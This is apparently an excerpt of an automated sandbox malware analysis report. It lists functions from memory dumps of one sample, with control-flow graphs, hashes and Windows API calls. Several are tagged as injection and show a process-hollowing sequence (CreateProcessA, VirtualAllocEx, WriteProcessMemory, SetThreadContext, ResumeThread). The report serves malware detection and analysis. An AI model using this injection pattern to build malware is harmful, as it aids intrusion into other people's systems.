                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 0c203f312ef26b74e50ff094c0c26df82a407bb48ab302133c8be811646b3cba
                            • Instruction ID: b345d31607ab4b8827b942cb4d2f3cd72a0e014214c226275199cf9fc5634d71
                            • Opcode Fuzzy Hash: 0c203f312ef26b74e50ff094c0c26df82a407bb48ab302133c8be811646b3cba
                            • Instruction Fuzzy Hash: F5A15EB1E0021ADFDB54DF69C840BEDBBB2BF48314F148569D819E7280D7749985CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D900 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 920 788d900-788d995 922 788d9ce-788d9ee 920->922 923 788d997-788d9a1 920->923 928 788d9f0-788d9fa 922->928 929 788da27-788da56 922->929 923->922 924 788d9a3-788d9a5 923->924 926 788d9c8-788d9cb 924->926 927 788d9a7-788d9b1 924->927 926->922 930 788d9b3 927->930 931 788d9b5-788d9c4 927->931 928->929 933 788d9fc-788d9fe 928->933 937 788da58-788da62 929->937 938 788da8f-788db49 CreateProcessA 929->938 930->931 931->931 932 788d9c6 931->932 932->926 934 788da00-788da0a 933->934 935 788da21-788da24 933->935 939 788da0c 934->939 940 788da0e-788da1d 934->940 935->929 937->938 941 788da64-788da66 937->941 951 788db4b-788db51 938->951 952 788db52-788dbd8 938->952 939->940 940->940 942 788da1f 940->942 943 788da68-788da72 941->943 944 788da89-788da8c 941->944 942->935 946 788da74 943->946 947 788da76-788da85 943->947 944->938 946->947 947->947 948 788da87 947->948 948->944 951->952 962 788dbe8-788dbec 952->962 963 788dbda-788dbde 952->963 964 788dbfc-788dc00 962->964 965 788dbee-788dbf2 962->965 963->962 966 788dbe0 963->966 968 788dc10-788dc14 964->968 969 788dc02-788dc06 964->969 965->964 967 788dbf4 965->967 966->962 967->964 971 788dc26-788dc2d 968->971 972 788dc16-788dc1c 968->972 969->968 970 788dc08 969->970 970->968 973 788dc2f-788dc3e 971->973 974 788dc44 971->974 972->971 973->974 975 788dc45 974->975 975->975
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0788DB36
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: b0f288c155faa333d2b5c1b8d9ff60aca1f03ce2eb4c41357c2056f35fecc92b
                            • Instruction ID: e9cc536732f34cef41f42e122e5344d66d2473882e22d7093b1c0868a9709c9b
                            • Opcode Fuzzy Hash: b0f288c155faa333d2b5c1b8d9ff60aca1f03ce2eb4c41357c2056f35fecc92b
                            • Instruction Fuzzy Hash: 32914DB1E0021ADFDB64DF69C840BEDBBB2BF48314F148569D818E7280DB749985CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154B117 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 977 154b117-154b137 978 154b163-154b167 977->978 979 154b139-154b146 call 154a44c 977->979 981 154b169-154b173 978->981 982 154b17b-154b1bc 978->982 986 154b15c 979->986 987 154b148 979->987 981->982 988 154b1be-154b1c6 982->988 989 154b1c9-154b1d7 982->989 986->978 1033 154b14e call 154b3c0 987->1033 1034 154b14e call 154b3b1 987->1034 988->989 990 154b1d9-154b1de 989->990 991 154b1fb-154b1fd 989->991 993 154b1e0-154b1e7 call 154a458 990->993 994 154b1e9 990->994 996 154b200-154b207 991->996 992 154b154-154b156 992->986 995 154b298-154b2c3 992->995 998 154b1eb-154b1f9 993->998 994->998 1015 154b2ca-154b310 995->1015 999 154b214-154b21b 996->999 1000 154b209-154b211 996->1000 998->996 1001 154b21d-154b225 999->1001 1002 154b228-154b231 call 154a468 999->1002 1000->999 1001->1002 1008 154b233-154b23b 1002->1008 1009 154b23e-154b243 1002->1009 1008->1009 1010 154b245-154b24c 1009->1010 1011 154b261-154b26e 1009->1011 1010->1011 1013 154b24e-154b25e call 154a478 call 154a488 1010->1013 1017 154b270-154b28e 1011->1017 1018 154b291-154b297 1011->1018 1013->1011 1027 154b312-154b358 1015->1027 1017->1018 1028 154b360-154b38b GetModuleHandleW 1027->1028 1029 154b35a-154b35d 1027->1029 1030 154b394-154b3a8 1028->1030 1031 154b38d-154b393 1028->1031 1029->1028 1031->1030 1033->992 1034->992
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0154B37E
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 608ce423c6aab3a31e0e10456559817b7445f4385676f0cacc992ba9cf6a3304
                            • Instruction ID: 05194e71b35fdc9fbec5d167bfe1949f1fefdeffe9822ef1eb5c87bf2a5dfaa1
                            • Opcode Fuzzy Hash: 608ce423c6aab3a31e0e10456559817b7445f4385676f0cacc992ba9cf6a3304
                            • Instruction Fuzzy Hash: F3811370A04B058FD764CF6AD54479ABBF1FF88308F048A2ED48ADBA50DB35E945CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01545E9C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01545F59
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 834caa694aee0bafedad3584e481b717704c5d2eabe2568f7cd1c592fff15ae2
                            • Instruction ID: 658b544f6a1041eb8f3d6f402a615dce3f4c870daff5cefdd6e924995a096123
                            • Opcode Fuzzy Hash: 834caa694aee0bafedad3584e481b717704c5d2eabe2568f7cd1c592fff15ae2
                            • Instruction Fuzzy Hash: 9241E0B0C00719CFDB24DFA9C848B9EBBF1BF88704F20806AD419AB255D7756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 015449F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01545F59
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 82f628dc2d99616c08db8354d265bc68ecb61b78194024fa5fc1a921e3751ff1
                            • Instruction ID: b49ed6c2cd611c8ee1382731cde9a2741d1afe026b41c36ec994875906a7d6a2
                            • Opcode Fuzzy Hash: 82f628dc2d99616c08db8354d265bc68ecb61b78194024fa5fc1a921e3751ff1
                            • Instruction Fuzzy Hash: 4241F0B0C00719CBDB24DFA9C848B9EBBF5BF48708F20806AD418AB255DB756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154B3B1 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0154B37E
                              • Part of subcall function 0154A4B0: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0154B3F9,00000800,00000000,00000000), ref: 0154B60A
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: a1206ef02e2e889acea0664f71b9e82d1ffeae2984c43bc26662a3fc93c57b54
                            • Instruction ID: e82c9e43835e2ebcf54d5350b2e003be9a7ded0090c53c477cb3202036f1dfb1
                            • Opcode Fuzzy Hash: a1206ef02e2e889acea0664f71b9e82d1ffeae2984c43bc26662a3fc93c57b54
                            • Instruction Fuzzy Hash: 322192B59002058FDB10CF6AD8447AFBBF5FF85318F15806AD919EB250D734D806CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0584BDC4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0584D2C5,?,?), ref: 0584D377
                            Memory Dump Source
                            • Source File: 00000008.00000002.2142405964.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5840000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DrawText
                            • String ID:
                            • API String ID: 2175133113-0
                            • Opcode ID: 5c4a2d9aab2530b1338c5f300417780ff6e028078f9afb8dba9c23385ae0bf16
                            • Instruction ID: 9a04aac7367838fa011b79d5053ecdb92b02143bb8a3dbf179f612254211d54d
                            • Opcode Fuzzy Hash: 5c4a2d9aab2530b1338c5f300417780ff6e028078f9afb8dba9c23385ae0bf16
                            • Instruction Fuzzy Hash: 2931EEB5D0520D9FCB10CF9AD884AAEFBF5FB48320F14842AE919A7310D774A944CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0584D2D8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0584D2C5,?,?), ref: 0584D377
                            Memory Dump Source
                            • Source File: 00000008.00000002.2142405964.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5840000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DrawText
                            • String ID:
                            • API String ID: 2175133113-0
                            • Opcode ID: deccef2e9b5c16598cd9f3a6b8ae33b069ac71b8f684cf29f45d70a6fbf7d318
                            • Instruction ID: c9c9e372bc344d17b8c7569abaa904abfdc957d3be7c81da05cdd7d27d54050c
                            • Opcode Fuzzy Hash: deccef2e9b5c16598cd9f3a6b8ae33b069ac71b8f684cf29f45d70a6fbf7d318
                            • Instruction Fuzzy Hash: 2531C0B59012499FDB10CF9AD884ADEFBF5FB48310F14842AE919A7310D774A944CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D238 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                            Download Yara Rule
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0788D2D0
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: c2afc0466d4f440ee78ab916742393f7780023b803a2533a5aa12a36c91d830c
                            • Instruction ID: be323fe1f7dbeac3c45b1bdea86d0e6c0a925cb4f360ce1dc9df02376578a85b
                            • Opcode Fuzzy Hash: c2afc0466d4f440ee78ab916742393f7780023b803a2533a5aa12a36c91d830c
                            • Instruction Fuzzy Hash: 112127B59003499FCB10DFA9C885BEEBBF5FF48310F108429E919A7251D778A954CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D240 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                            Download Yara Rule
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0788D2D0
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 3c06a07bfb120f82ec9146914934cb5e5f9e1df765e9e17f67cacb1d24346aee
                            • Instruction ID: c784123fb12cd14d9d65c910011fc5ee394a6f451ab91aba602da5ef1fae43a2
                            • Opcode Fuzzy Hash: 3c06a07bfb120f82ec9146914934cb5e5f9e1df765e9e17f67cacb1d24346aee
                            • Instruction Fuzzy Hash: 8C214AB5D003499FCB10DFA9C885BEEBBF5FF48310F108429E919A7241C778A954CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788CC68 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0788CCEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: abfaea5cd5ee179539b26df75579cc026824a172b8f1bfda42d42cb87608f313
                            • Instruction ID: bc4887113b77297952150a1cf1cb0821000711d633cce611a3762536a35697ba
                            • Opcode Fuzzy Hash: abfaea5cd5ee179539b26df75579cc026824a172b8f1bfda42d42cb87608f313
                            • Instruction Fuzzy Hash: 402128B19002098FDB10DFAAC485BEEBBF5FF88314F14842AD519A7245CB78A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D762 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0788D7E8
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 33fe0578fcbfe892a7c55369aa9c51dc9315aa37305cd454c37786df7b5d6565
                            • Instruction ID: 2483672874b8615f5ee3a3577c2a4067f01ab41ac677f86d4fcaf9d2d461b763
                            • Opcode Fuzzy Hash: 33fe0578fcbfe892a7c55369aa9c51dc9315aa37305cd454c37786df7b5d6565
                            • Instruction Fuzzy Hash: 7E2128B1D002499FDB10DFAAC985AEEFBF5FF88310F508429E519A7240C738A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154DA08 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0154DA97
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: b09fac24e326a01ac3ba6d49666c0fe802c1d7396484fa7ff7b7fc144c2a8dba
                            • Instruction ID: af20ad9d5c1bdd9f2afd25f5a71cfb40d452898dc946389752a1842b3fd09702
                            • Opcode Fuzzy Hash: b09fac24e326a01ac3ba6d49666c0fe802c1d7396484fa7ff7b7fc144c2a8dba
                            • Instruction Fuzzy Hash: A721E3B5901208AFDB10CFAAD584AEEFBF5FB48310F14841AE918A7310C379A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D768 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0788D7E8
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: cf4c2b8b7bd69c7cad7ca2b0ee522cb730f6d51019c61fba9c1431c760c13547
                            • Instruction ID: fad6f1c84b8784f12f30e4e27a6947d57bfab708ac92727e280b4c1020c0469b
                            • Opcode Fuzzy Hash: cf4c2b8b7bd69c7cad7ca2b0ee522cb730f6d51019c61fba9c1431c760c13547
                            • Instruction Fuzzy Hash: BA2138B1D003499FCB10DFAAC884AEEFBF5FF48310F50842AE519A7240C7389944CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788CC70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0788CCEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 96d3916d47eb4c2933d423ff53fefb40e19f47526859716392e9300c3f900b09
                            • Instruction ID: 18a09be2f0acbd7edd605740fa2c56b02170b4e7156c13f9320a862d19ed1176
                            • Opcode Fuzzy Hash: 96d3916d47eb4c2933d423ff53fefb40e19f47526859716392e9300c3f900b09
                            • Instruction Fuzzy Hash: 9A2118B19002098FDB10DFAAC4857EEBBF5EF48324F148429D519A7241CB789945CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154DA10 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0154DA97
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: ce69eac75018ce7bdf97662b1b4ff3319d15b355de1882fa9a8b02b6c357776e
                            • Instruction ID: 86f697655ec42a90f285b2ae95ae4b5e829b5540f86e563f667df6c94dc78443
                            • Opcode Fuzzy Hash: ce69eac75018ce7bdf97662b1b4ff3319d15b355de1882fa9a8b02b6c357776e
                            • Instruction Fuzzy Hash: 3521D5B59002499FDB10CF9AD584ADEFFF9FB48310F14841AE918A7350D378A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D178 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0788D1EE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: b8f1353aaa94588ec88a3200a2443af1b513a1a1ff4ac5020ea934ce2892e42a
                            • Instruction ID: ad8a3296e015e3d135c4febce3d9a663b9faa8e00665dcef14ca76ded32db015
                            • Opcode Fuzzy Hash: b8f1353aaa94588ec88a3200a2443af1b513a1a1ff4ac5020ea934ce2892e42a
                            • Instruction Fuzzy Hash: D02159B59002499FCB10DFAAC844BEEFBF5FF88320F148819E519A7250C739A541CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154A4B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0154B3F9,00000800,00000000,00000000), ref: 0154B60A
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 16e8f88e68e4927c1cde6ee2e602cdf11f5f5baeffa25acbc16cfc50c0e1bb2e
                            • Instruction ID: 77838b310bebbc9369896be364e7effe835fc86145abdf8d8396e6582724d792
                            • Opcode Fuzzy Hash: 16e8f88e68e4927c1cde6ee2e602cdf11f5f5baeffa25acbc16cfc50c0e1bb2e
                            • Instruction Fuzzy Hash: 9111D3B69002099FDB24DF9AC444AEEFBF4FB88714F14842AD519A7200D379A545CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D180 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0788D1EE
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: fdc5b0b45f67f67c4eb8e00144edc1e7eada91d12aa808d52f26a5917aa9bd9c
                            • Instruction ID: 56b16323007e975e5a5c1400b79054de4422f2dcba7a23538394e447c9d7e000
                            • Opcode Fuzzy Hash: fdc5b0b45f67f67c4eb8e00144edc1e7eada91d12aa808d52f26a5917aa9bd9c
                            • Instruction Fuzzy Hash: 481126B59002499FCB10DFAAC844AEEFBF5EF88320F108419E519A7250C779A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154B598 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0154B3F9,00000800,00000000,00000000), ref: 0154B60A
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: a6a2027fdc84749a870976333a9257b93a7a4c80900687ccf1ef64b04faacedd
                            • Instruction ID: 5b474cee7be46f6a0a9577b513c8821b1a078544ab2a67cc1f38927a8e2360c0
                            • Opcode Fuzzy Hash: a6a2027fdc84749a870976333a9257b93a7a4c80900687ccf1ef64b04faacedd
                            • Instruction Fuzzy Hash: BE1123B6C002098FDB24CFAAD548ADEFBF5FB88314F10842AD519B7610C379A644CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788CBB8 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: de7762ac58f390d22614c34739d67eb30ea06c28e4147a224eb30c3631152965
                            • Instruction ID: 7c0729fc66583f3852c014e719af251ddf0be76ebffa41b7a71aac3709415bc5
                            • Opcode Fuzzy Hash: de7762ac58f390d22614c34739d67eb30ea06c28e4147a224eb30c3631152965
                            • Instruction Fuzzy Hash: D0116AB1C002498FDB20DFAAC4457EEFBF5EF88324F20841AC519A7240C778A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788CBC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.2144059205.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7880000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 7474605fceacf39ce752102d58b58beeea2f306b19fa61e2586a0e515b61a163
                            • Instruction ID: 8d4efa4439d3a180511a8362392ff09a1ff430ce9a1a41c6c22ca9a5e29f6281
                            • Opcode Fuzzy Hash: 7474605fceacf39ce752102d58b58beeea2f306b19fa61e2586a0e515b61a163
                            • Instruction Fuzzy Hash: FD113AB1D002498FCB20DFAAC4457EEFBF5EF88324F208419D519A7240CB79A544CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0EFF1601 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,?,?,?), ref: 0EFF1665
                            Memory Dump Source
                            • Source File: 00000008.00000002.2146047318.000000000EFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EFF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_eff0000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: f7f3f2e83fe5930c2c067834db10b208bfb2a6c25611ccc178af839c2e81ab43
                            • Instruction ID: e6b7bc9e4d0441016d7373b4799bad64c99ef3f08e01309f516c205c27d8e99b
                            • Opcode Fuzzy Hash: f7f3f2e83fe5930c2c067834db10b208bfb2a6c25611ccc178af839c2e81ab43
                            • Instruction Fuzzy Hash: 3E11F2B5800349DFCB10DF9AC999BDEBBF8EB49720F14841AE518A7211C379A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154B318 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0154B37E
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 807e7108a0328a9e20138c28d3ae4794307b819b98f74a696353791f2e964f31
                            • Instruction ID: 3871da734f72010f6139e7f56cbaaab498990fa8ad6fa61a3cee7ad2fef7d66e
                            • Opcode Fuzzy Hash: 807e7108a0328a9e20138c28d3ae4794307b819b98f74a696353791f2e964f31
                            • Instruction Fuzzy Hash: CF11DFB5C002498FDB24DF9AC444A9EFBF4FB88614F10841AD929A7210C379A545CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0EFF1608 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,?,?,?), ref: 0EFF1665
                            Memory Dump Source
                            • Source File: 00000008.00000002.2146047318.000000000EFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EFF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_eff0000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 5dc9c4c075f2aea8d4a6939de12bb48a36a1e7edb42e048a95acc3ad131a664d
                            • Instruction ID: e8c84070073b2e25659663209a81c6fee8b1389a45ebe9e1a4bb3b48680dea09
                            • Opcode Fuzzy Hash: 5dc9c4c075f2aea8d4a6939de12bb48a36a1e7edb42e048a95acc3ad131a664d
                            • Instruction Fuzzy Hash: 1011D0B5800349DFDB10DF9AC989BDEFBF8EB48720F14841AE518A7211C379A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 014ED4C4 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
